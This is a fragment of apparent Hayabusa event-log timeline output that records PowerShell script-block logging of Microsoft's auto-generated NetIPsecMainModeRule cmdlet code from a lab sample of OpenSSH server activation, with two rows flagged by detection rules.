[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 